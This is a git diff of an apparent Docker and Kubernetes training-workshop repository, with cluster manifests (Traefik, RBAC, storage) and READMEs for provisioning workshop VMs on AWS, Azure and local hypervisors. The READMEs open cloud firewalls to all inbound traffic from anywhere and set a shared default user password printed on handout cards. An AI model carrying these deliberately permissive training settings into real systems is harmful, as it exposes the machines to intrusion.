selfLink: /api/v1/namespaces/kube-system/services/socat
|
||||
spec:
|
||||
externalTrafficPolicy: Cluster
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: socat
|
||||
sessionAffinity: None
|
||||
type: NodePort
|
||||
status:
|
||||
loadBalancer: {}
|
||||
11
k8s/storage-class.yaml
Normal file
11
k8s/storage-class.yaml
Normal file
@@ -0,0 +1,11 @@
|
||||
kind: StorageClass
|
||||
apiVersion: storage.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: portworx-replicated
|
||||
annotations:
|
||||
storageclass.kubernetes.io/is-default-class: "true"
|
||||
provisioner: kubernetes.io/portworx-volume
|
||||
parameters:
|
||||
repl: "2"
|
||||
priority_io: "high"
|
||||
|
||||
100
k8s/traefik.yaml
Normal file
100
k8s/traefik.yaml
Normal file
@@ -0,0 +1,100 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: extensions/v1beta1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --api
|
||||
- --kubernetes
|
||||
- --logLevel=INFO
|
||||
---
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: traefik-ingress-service
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: traefik-ingress-lb
|
||||
ports:
|
||||
- protocol: TCP
|
||||
port: 80
|
||||
name: web
|
||||
- protocol: TCP
|
||||
port: 8080
|
||||
name: admin
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
33
k8s/users:jean.doe.yaml
Normal file
33
k8s/users:jean.doe.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ users:jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: users:jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
70
k8s/volumes-for-consul.yaml
Normal file
70
k8s/volumes-for-consul.yaml
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
annotations:
|
||||
node: node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
annotations:
|
||||
node: node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
annotations:
|
||||
node: node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
5
netlify.toml
Normal file
5
netlify.toml
Normal file
@@ -0,0 +1,5 @@
|
||||
[build]
|
||||
base = "slides"
|
||||
publish = "slides"
|
||||
command = "./build.sh once"
|
||||
|
||||
@@ -13,11 +13,12 @@ Virtualbox, Vagrant and Ansible
|
||||
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
|
||||
|
||||
- Vagrant: https://www.vagrantup.com/downloads.html
|
||||
- install vagrant-vbguest plugin (https://github.com/dotless-de/vagrant-vbguest)
|
||||
|
||||
- Ansible:
|
||||
- install Ansible's prerequisites:
|
||||
|
||||
$ sudo pip install paramiko PyYAML Jinja2 httplib2 six
|
||||
$ sudo pip install paramiko PyYAML Jinja2 httplib2 six pycrypto
|
||||
|
||||
- clone the Ansible repository and checkout to a stable version
|
||||
(don't forget the `--recursive` argument when cloning!):
|
||||
@@ -31,7 +32,7 @@ Virtualbox, Vagrant and Ansible
|
||||
|
||||
$ source path/to/your-ansible-clone/hacking/env-setup
|
||||
|
||||
- you need to repeat the last step everytime you open a new terminal session
|
||||
- you need to repeat the last step every time you open a new terminal session
|
||||
and want to use any Ansible command (but you'll probably only need to run
|
||||
it once).
|
||||
|
||||
|
||||
@@ -93,7 +93,7 @@
|
||||
line: "{{ item.private_ip }} {{ item.hostname }}"
|
||||
regexp: "^{{ item.private_ip }} {{ item.hostname }}$"
|
||||
state: present
|
||||
with_items: instances
|
||||
with_items: "{{ instances }}"
|
||||
|
||||
- name: copying the ssh key to the nodes
|
||||
copy:
|
||||
|
||||
242
prepare-machine/README.md
Normal file
242
prepare-machine/README.md
Normal file
@@ -0,0 +1,242 @@
|
||||
# Setting up your own cluster
|
||||
If you want to go through this orchestration workshop on your own,
|
||||
you will need a cluster of Docker nodes.
|
||||
|
||||
These instructions will walk you through the required steps,
|
||||
using [Docker Machine](https://docs.docker.com/machine/) to
|
||||
create the nodes.
|
||||
|
||||
|
||||
## Requirements
|
||||
|
||||
You need Docker Machine. To check if it is installed, try to
|
||||
run the following command:
|
||||
|
||||
```bash
|
||||
$ docker-machine -v
|
||||
docker-machine version 0.8.2, build e18a919
|
||||
```
|
||||
|
||||
If you see a Docker Machine version number, perfect! Otherwise,
|
||||
you need to install it; either as part of the Docker Toolbox,
|
||||
or as a stand-alone tool. See [Docker Machine installation docs](
|
||||
https://docs.docker.com/machine/install-machine/) for details.
|
||||
|
||||
You also need either credentials for a cloud provider, or a
|
||||
local VirtualBox or VMware installation (or anything supported
|
||||
by Docker Machine, really).
|
||||
|
||||
|
||||
## Discrepancies with official environment
|
||||
|
||||
The resulting environment will be slightly different from the
|
||||
one that we provision for people attending the workshop at
|
||||
conferences and similar events, and you will have to adapt a
|
||||
few things.
|
||||
|
||||
We try to list all the differences here.
|
||||
|
||||
|
||||
### User name
|
||||
|
||||
The official environment uses user `docker`. If you use
|
||||
Docker Machine, the user name will probably be different.
|
||||
|
||||
### Node aliases
|
||||
|
||||
In the official environment, aliases are seeded in
|
||||
`/etc/hosts`, allowing you to resolve node IP addresses
|
||||
with the aliases `node1`, `node2`, etc.; if you use
|
||||
Docker Machine, you will have to lookup the IP addresses
|
||||
with the `docker-machine ip nodeX` command instead.
|
||||
|
||||
### SSH keys
|
||||
|
||||
In the official environment, you can log from one node
|
||||
to another with SSH, without having to provide a password,
|
||||
thanks to pre-generated (and pre-copied) SSH keys.
|
||||
If you use Docker Machine, you will have to use
|
||||
`docker-machine ssh` from your machine instead.
|
||||
|
||||
### Machine and Compose
|
||||
|
||||
In the official environment, Docker Machine and Docker
|
||||
Compose are installed on your nodes. If you use Docker
|
||||
Machine you will have to install at least Docker Compose.
|
||||
|
||||
The easiest way to install Compose (verified to work
|
||||
with the EC2 and VirtualBox drivers, and probably others
|
||||
as well) is do use `docker-machine ssh` to connect
|
||||
to your node, then run the following command:
|
||||
|
||||
```bash
|
||||
sudo curl -L \
|
||||
https://github.com/docker/compose/releases/download/1.15.0/docker-compose-`uname -s`-`uname -m` \
|
||||
-o /usr/local/bin/docker-compose
|
||||
sudo chmod +x /usr/local/bin/docker-compose
|
||||
```
|
||||
|
||||
Note that it is not necessary (or even useful) to
|
||||
install Docker Machine on your nodes, since if you're
|
||||
following that guide, you already have Machine on
|
||||
your local computer. ☺
|
||||
|
||||
|
||||
### IP addresses
|
||||
|
||||
In some environments, your nodes will have multiple
|
||||
IP addresses. This is the case with VirtualBox, for
|
||||
instance. At any point in the workshop, if you need
|
||||
a node's IP address, you should use the address
|
||||
given by the `docker-machine ip` command.
|
||||
|
||||
|
||||
## Creating your nodes with Docker Machine
|
||||
|
||||
Here are some instructions for various Machine Drivers.
|
||||
|
||||
|
||||
### AWS EC2
|
||||
|
||||
You have to retrieve your AWS access key and secret access key,
|
||||
and set the following environment variables:
|
||||
|
||||
```bash
|
||||
export MACHINE_DRIVER=amazonec2
|
||||
export AWS_ACCESS_KEY_ID=AKI...
|
||||
export AWS_SECRET_ACCESS_KEY=...
|
||||
```
|
||||
|
||||
Optionally, you can also set `AWS_DEFAULT_REGION` to the region
|
||||
closest to you. See [AWS documentation](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-regions)
|
||||
for the list of available regions and their codes.
|
||||
|
||||
For instance, if you are on the US West Coast, I recommend
|
||||
that you set `AWS_DEFAULT_REGION` to `us-west-2`; if you are
|
||||
in Europe, to `eu-central-1` (except in UK and Ireland where
|
||||
you probably want `eu-west-1`), etc.
|
||||
|
||||
If you don't specify anything, your nodes will be in `us-east-1`.
|
||||
|
||||
You can also set `AWS_INSTANCE_TYPE` if you want bigger or smaller
|
||||
instances than `t2.micro`. For the official workshops, we use
|
||||
`m3.large`, but remember: the bigger the instance, the more
|
||||
expensive it gets, obviously!
|
||||
|
||||
After setting these variables, run the following command:
|
||||
|
||||
```bash
|
||||
for N in $(seq 1 5); do
|
||||
docker-machine create node$N
|
||||
docker-machine ssh node$N usermod -aG docker ubuntu
|
||||
done
|
||||
```
|
||||
|
||||
And after a few minutes, your five nodes will be ready. To log
|
||||
into a node, use `docker-machine ssh nodeX`.
|
||||
|
||||
By default, Docker Machine places the created nodes in a
|
||||
security group aptly named `docker-machine`. By default, this
|
||||
group is pretty restrictive, and will only let you connect
|
||||
to the Docker API and SSH. For the purpose of the workshop,
|
||||
you will need to open that security group to normal traffic.
|
||||
You can do that through the AWS EC2 console, or with the
|
||||
following CLI command:
|
||||
|
||||
```bash
|
||||
aws ec2 authorize-security-group-ingress --group-name docker-machine --protocol -1 --cidr 0.0.0.0/0
|
||||
```
|
||||
|
||||
If Docker Machine fails, complaining that it cannot find
|
||||
the default VPC or subnet, this could be because you have
|
||||
an "old" EC2 account (created before the introduction of EC2
|
||||
VPC) and your account has no default VPC. In that case,
|
||||
you will have to create a VPC, a subnet in that VPC,
|
||||
and use the corresponding Machine flags (`--amazonec2-vpc-id`
|
||||
and `--amazonec2-subnet-id`) or environment variables
|
||||
(`AWS_VPC_ID` and `AWS_SUBNET_ID`) to tell Machine what to use.
|
||||
|
||||
You will get similar error messages if you *have* set these
|
||||
flags (or environment variables) but the VPC (or subnets)
|
||||
indicated do not exist. This can happen if you frequently
|
||||
switch between different EC2 accounts, and forget that you
|
||||
have set the `AWS_VPC_ID` or `AWS_SUBNET_ID`.
|
||||
|
||||
|
||||
### Microsoft Azure
|
||||
|
||||
You have to retrieve your subscription ID, and set the following environment
|
||||
variables:
|
||||
|
||||
```bash
|
||||
export MACHINE_DRIVER=azure
|
||||
export AZURE_SUBSCRIPTION_ID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
|
||||
```
|
||||
|
||||
Additionally, you can set `AZURE_LOCATION` to an Azure datacenter
|
||||
close to you. By default, it will pick "West US". You can see
|
||||
the available regions [on Azure's website](
|
||||
https://azure.microsoft.com/en-us/regions/services/).
|
||||
For instance, if you want to deploy on the US East Coast,
|
||||
set `AZURE_LOCATION` to `East US` or `eastus` (capitalization
|
||||
and spacing shouldn't matter; just use the names shown on the
|
||||
map or table on Azure's website).
|
||||
|
||||
Then run the following command:
|
||||
|
||||
```bash
|
||||
for N in $(seq 1 5); do
|
||||
docker-machine create node$N
|
||||
docker-machine ssh node$N usermod -aG docker docker-user
|
||||
done
|
||||
```
|
||||
|
||||
The CLI will give you instructions to authenticate on the Azure portal,
|
||||
and once you've done that, it will create your VMs.
|
||||
|
||||
You will log into your nodes with `docker-machine ssh nodeX`.
|
||||
|
||||
By default, the firewall only allows access to the Docker API
|
||||
and SSH ports. To open access to other ports, you can use the
|
||||
following command:
|
||||
|
||||
```bash
|
||||
for N in $(seq 1 5); do
|
||||
az network nsg rule create -g docker-machine --name AllowAny --nsg-name node$N-firewall \
|
||||
--access allow --direction inbound --protocol '*' \
|
||||
--source-address-prefix '*' --source-port-range '*' \
|
||||
--destination-address-prefix '*' --destination-port-range '*'
|
||||
done
|
||||
```
|
||||
|
||||
(The command takes a while. Be patient.)
|
||||
|
||||
|
||||
### Local VirtualBox or VMware Fusion
|
||||
|
||||
If you want to run with local VMs, set the environment variable
|
||||
`MACHINE_DRIVER` to `virtualbox` or `vmwarefusion` and create your nodes:
|
||||
|
||||
```bash
|
||||
export MACHINE_DRIVER=virtualbox
|
||||
for N in $(seq 1 5); do
|
||||
docker-machine create node$N
|
||||
done
|
||||
```
|
||||
|
||||
|
||||
### Terminating instances
|
||||
|
||||
When you're done, if you started your instance on a public
|
||||
cloud (or anywhere where it costs you money!) you will want to
|
||||
terminate (destroy) them. This can be done with the following
|
||||
command:
|
||||
|
||||
```bash
|
||||
for N in $(seq 1 5); do
|
||||
docker-machine rm -f node$N
|
||||
done
|
||||
```
|
||||
|
||||
|
||||
|
||||
@@ -2,7 +2,6 @@ FROM debian:jessie
|
||||
MAINTAINER AJ Bowen <aj@soulshake.net>
|
||||
|
||||
RUN apt-get update && apt-get install -y \
|
||||
wkhtmltopdf \
|
||||
bsdmainutils \
|
||||
ca-certificates \
|
||||
curl \
|
||||
@@ -12,19 +11,20 @@ RUN apt-get update && apt-get install -y \
|
||||
man \
|
||||
pssh \
|
||||
python \
|
||||
python-pip \
|
||||
python-docutils \
|
||||
python-pip \
|
||||
ssh \
|
||||
wkhtmltopdf \
|
||||
xvfb \
|
||||
--no-install-recommends \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN pip install \
|
||||
awscli \
|
||||
jinja2 \
|
||||
pdfkit \
|
||||
PyYAML \
|
||||
termcolor
|
||||
|
||||
WORKDIR $HOME
|
||||
RUN echo "alias ll='ls -lahF'" >> /root/.bashrc
|
||||
ENTRYPOINT ["/root/prepare-vms/scripts/trainer-cli"]
|
||||
|
||||
RUN mv $(which wkhtmltopdf) $(which wkhtmltopdf).real
|
||||
COPY lib/wkhtmltopdf /usr/local/bin/wkhtmltopdf
|
||||
|
||||
@@ -1,67 +1,197 @@
|
||||
# Trainer tools to prepare VMs for Docker workshops
|
||||
# Trainer tools to create and prepare VMs for Docker workshops
|
||||
|
||||
## 1. Prerequisites
|
||||
These tools can help you to create VMs on:
|
||||
|
||||
* [Docker](https://docs.docker.com/engine/installation/)
|
||||
* [Docker Compose](https://docs.docker.com/compose/install/)
|
||||
- Azure
|
||||
- EC2
|
||||
- OpenStack
|
||||
|
||||
## 2. Clone the repo
|
||||
## Prerequisites
|
||||
|
||||
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
|
||||
$ cd orchestration-workshop/prepare-vms
|
||||
- [Docker](https://docs.docker.com/engine/installation/)
|
||||
- [Docker Compose](https://docs.docker.com/compose/install/)
|
||||
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
|
||||
|
||||
Depending on the infrastructure that you want to use, you also need to install
|
||||
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
|
||||
|
||||
And if you want to generate printable cards:
|
||||
|
||||
- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
|
||||
- [jinja2](https://pypi.python.org/pypi/Jinja2) (on a Mac: `brew install jinja2`)
|
||||
|
||||
## General Workflow
|
||||
|
||||
- fork/clone repo
|
||||
- create an infrastructure configuration in the `prepare-vms/infra` directory
|
||||
(using one of the example files in that directory)
|
||||
- create your own setting file from `settings/example.yaml`
|
||||
- if necessary, increase allowed open files: `ulimit -Sn 10000`
|
||||
- run `./workshopctl start` to create instances
|
||||
- run `./workshopctl deploy` to install Docker and setup environment
|
||||
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
|
||||
- run `./workshopctl cards` (if you want to generate PDF for printing handouts of each users host IP's and login info)
|
||||
- run `./workshopctl stop` at the end of the workshop to terminate instances
|
||||
|
||||
## Clone/Fork the Repo, and Build the Tools Image
|
||||
|
||||
The Docker Compose file here is used to build a image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
|
||||
|
||||
$ git clone https://github.com/jpetazzo/container.training
|
||||
$ cd container.training/prepare-vms
|
||||
$ docker-compose build
|
||||
$ ./trainer <commands> # See "Summary of commands" section below
|
||||
|
||||
## 3. Preparing the environment
|
||||
|
||||
Required environment variables:
|
||||
## Preparing to Run `./workshopctl`
|
||||
|
||||
* `AWS_ACCESS_KEY_ID`
|
||||
* `AWS_SECRET_ACCESS_KEY`
|
||||
* `AWS_DEFAULT_REGION`
|
||||
### Required AWS Permissions/Info
|
||||
|
||||
### 4. Update settings.yaml
|
||||
- Initial assumptions are you're using a root account. If you'd like to use a IAM user, it will need `AmazonEC2FullAccess` and `IAMReadOnlyAccess`.
|
||||
- Using a non-default VPC or Security Group isn't supported out of box yet, so you will have to customize `lib/commands.sh` if you want to change that.
|
||||
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.
|
||||
|
||||
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `deploy`, `cards`, etc.
|
||||
### Create your `infra` file
|
||||
|
||||
## Usage
|
||||
You need to do this only once. (On AWS, you can create one `infra`
|
||||
file per region.)
|
||||
|
||||
### Summary of commands
|
||||
Make a copy of one of the example files in the `infra` directory.
|
||||
|
||||
The `trainer` script can be executed directly.
|
||||
For instance:
|
||||
|
||||
Summary of steps to launch a batch of instances for a workshop:
|
||||
```bash
|
||||
cp infra/example.aws infra/aws-us-west-2
|
||||
```
|
||||
|
||||
* Export the environment variables needed by the AWS CLI (see **2. Preparing the environment** above)
|
||||
* `./trainer start N` (where `N` is the number of AWS instances to create)
|
||||
* `./trainer list` to view the list of tags
|
||||
* `./trainer list TAG` to view the instances with a given `TAG`
|
||||
* `./trainer deploy TAG settings/somefile.yaml` to run `scripts/postprep.rc` via parallel-ssh
|
||||
* `./trainer pull-images TAG` to pre-pull a bunch of Docker images to the instances
|
||||
* `./trainer test TAG`
|
||||
* `./trainer cards TAG settings/somefile.yaml` to generate a PDF and an HTML file you can print and cut to hand out cards with connection information to attendees
|
||||
Edit your infrastructure file to customize it.
|
||||
You will probably need to put your cloud provider credentials,
|
||||
select region...
|
||||
|
||||
`./trainer` will run locally if all its dependencies are fulfilled; otherwise it will run in a Docker container.
|
||||
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
|
||||
|
||||
It will check for the necessary environment variables. Then, if all its dependencies are installed
|
||||
locally, it will execute `trainer-cli`. If not, it will look for a local Docker image
|
||||
tagged `preparevms_prepare-vms` (created automatically when you run `docker-compose build`).
|
||||
If found, it will run in a container. If not found, the user will be prompted to
|
||||
either install the missing dependencies or run `docker-compose build`.
|
||||
### Create your `settings` file
|
||||
|
||||
## Detailed usage
|
||||
Similarly, pick one of the files in `settings` and copy it
|
||||
to customize it.
|
||||
|
||||
### Start some VMs
|
||||
For instance:
|
||||
|
||||
$ ./trainer start 10
|
||||
```bash
|
||||
cp settings/example.yaml settings/myworkshop.yaml
|
||||
```
|
||||
|
||||
A few things will happen:
|
||||
You're all set!
|
||||
|
||||
* Your local SSH key will be synced
|
||||
* AWS instances will be created and tagged
|
||||
* A directory will be created
|
||||
## `./workshopctl` Usage
|
||||
|
||||
Details below.
|
||||
```
|
||||
workshopctl - the orchestration workshop swiss army knife
|
||||
Commands:
|
||||
ami Show the AMI that will be used for deployment
|
||||
amis List Ubuntu AMIs in the current region
|
||||
build Build the Docker image to run this program in a container
|
||||
cards Generate ready-to-print cards for a group of VMs
|
||||
deploy Install Docker on a bunch of running VMs
|
||||
ec2quotas Check our EC2 quotas (max instances)
|
||||
help Show available commands
|
||||
ids List the instance IDs belonging to a given tag or token
|
||||
ips List the IP addresses of the VMs for a given tag or token
|
||||
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
|
||||
kubetest Check that all notes are reporting as Ready
|
||||
list List available groups in the current region
|
||||
opensg Open the default security group to ALL ingress traffic
|
||||
pull_images Pre-pull a bunch of Docker images
|
||||
retag Apply a new tag to a group of VMs
|
||||
start Start a group of VMs
|
||||
status List instance status for a given group
|
||||
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
|
||||
test Run tests (pre-flight checks) on a group of VMs
|
||||
wrap Run this program in a container
|
||||
```
|
||||
|
||||
### Summary of What `./workshopctl` Does For You
|
||||
|
||||
- Used to manage bulk AWS instances for you without needing to use AWS cli or gui.
|
||||
- Can manage multiple "tags" or groups of instances, which are tracked in `prepare-vms/tags/`
|
||||
- Can also create PDF/HTML for printing student info for instance IP's and login.
|
||||
- The `./workshopctl` script can be executed directly.
|
||||
- It will run locally if all its dependencies are fulfilled; otherwise it will run in the Docker container you created with `docker-compose build` (preparevms_prepare-vms).
|
||||
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
|
||||
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. This can be configured with the `docker_user_password` property in the settings file.
|
||||
|
||||
### Example Steps to Launch a group of AWS Instances for a Workshop
|
||||
|
||||
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --count 60` to create 60 EC2 instances
|
||||
- Your local SSH key will be synced to instances under `ubuntu` user
|
||||
- AWS instances will be created and tagged based on date, and IP's stored in `prepare-vms/tags/`
|
||||
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
|
||||
- If it errors or times out, you should be able to rerun
|
||||
- Requires good connection to run all the parallel SSH connections, up to 100 parallel (ProTip: create dedicated management instance in same AWS region where you run all these utils from)
|
||||
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
|
||||
- Run `./workshopctl cards TAG` generates PDF/HTML files to print and cut and hand out to students
|
||||
- *Have a great workshop*
|
||||
- Run `./workshopctl stop TAG` to terminate instances.
|
||||
|
||||
### Example Steps to Launch Azure Instances
|
||||
|
||||
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
|
||||
- Customize `azuredeploy.parameters.json`
|
||||
- Required:
|
||||
- Provide the SSH public key you plan to use for instance configuration
|
||||
- Optional:
|
||||
- Choose a name for the workshop (default is "workshop")
|
||||
- Choose the number of instances (default is 3)
|
||||
- Customize the desired instance size (default is Standard_D1_v2)
|
||||
- Launch instances with your chosen resource group name and your preferred region; the examples are "workshop" and "eastus":
|
||||
```
|
||||
az group create --name workshop --location eastus
|
||||
az group deployment create --resource-group workshop --template-file azuredeploy.json --parameters @azuredeploy.parameters.json
|
||||
```
|
||||
|
||||
The `az group deployment create` command can take several minutes and will only say `- Running ..` until it completes, unless you increase the verbosity with `--verbose` or `--debug`.
|
||||
|
||||
To display the IPs of the instances you've launched:
|
||||
|
||||
```
|
||||
az vm list-ip-addresses --resource-group workshop --output table
|
||||
```
|
||||
|
||||
If you want to put the IPs into `prepare-vms/tags/<tag>/ips.txt` for a tag of "myworkshop":
|
||||
|
||||
1) If you haven't yet installed `jq` and/or created your event's tags directory in `prepare-vms`:
|
||||
|
||||
```
|
||||
brew install jq
|
||||
mkdir -p tags/myworkshop
|
||||
```
|
||||
|
||||
2) And then generate the IP list:
|
||||
|
||||
```
|
||||
az vm list-ip-addresses --resource-group workshop --output json | jq -r '.[].virtualMachine.network.publicIpAddresses[].ipAddress' > tags/myworkshop/ips.txt
|
||||
```
|
||||
|
||||
After the workshop is over, remove the instances:
|
||||
|
||||
```
|
||||
az group delete --resource-group workshop
|
||||
```
|
||||
|
||||
### Example Steps to Configure Instances from a non-AWS Source
|
||||
|
||||
- Copy `infra/example.generic` to `infra/generic`
|
||||
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
|
||||
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
|
||||
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
|
||||
- Edit the file `prepare-vms/tags/TAG/ips.txt`, it should list the IP addresses of the VMs (one per line, without any comments or other info)
|
||||
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
|
||||
- Optionally, configure Kubernetes clusters of the size in the settings: workshopctl kube `TAG`
|
||||
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: workshopctl kubetest `TAG`
|
||||
- Generate cards to print and hand out: workshopctl cards `TAG`
|
||||
- Print the cards file: prepare-vms/tags/`TAG`/ips.html
|
||||
|
||||
|
||||
## Even More Details
|
||||
|
||||
#### Sync of SSH keys
|
||||
|
||||
@@ -71,7 +201,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
|
||||
|
||||
#### Instance + tag creation
|
||||
|
||||
10 VMs will be started, with an automatically generated tag (timestamp + your username).
|
||||
The VMs will be started, with an automatically generated tag (timestamp + your username).
|
||||
|
||||
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
|
||||
|
||||
@@ -79,41 +209,39 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
|
||||
|
||||
Following the creation of the VMs, a text file will be created containing a list of their IPs.
|
||||
|
||||
This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.
|
||||
|
||||
If you create new VMs, the symlinked file will be overwritten.
|
||||
|
||||
## Deployment
|
||||
#### Deployment
|
||||
|
||||
Instances can be deployed manually using the `deploy` command:
|
||||
|
||||
$ ./trainer deploy TAG settings/somefile.yaml
|
||||
$ ./workshopctl deploy TAG
|
||||
|
||||
The `postprep.rc` file will be copied via parallel-ssh to all of the VMs and executed.
|
||||
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
|
||||
|
||||
### Pre-pull images
|
||||
#### Pre-pull images
|
||||
|
||||
$ ./trainer pull-images TAG
|
||||
$ ./workshopctl pull_images TAG
|
||||
|
||||
### Generate cards
|
||||
#### Generate cards
|
||||
|
||||
$ ./trainer cards TAG settings/somefile.yaml
|
||||
$ ./workshopctl cards TAG
|
||||
|
||||
### List tags
|
||||
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
|
||||
|
||||
$ ./trainer list
|
||||
If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency. If you plan to just print the HTML cards, you can ignore this.
|
||||
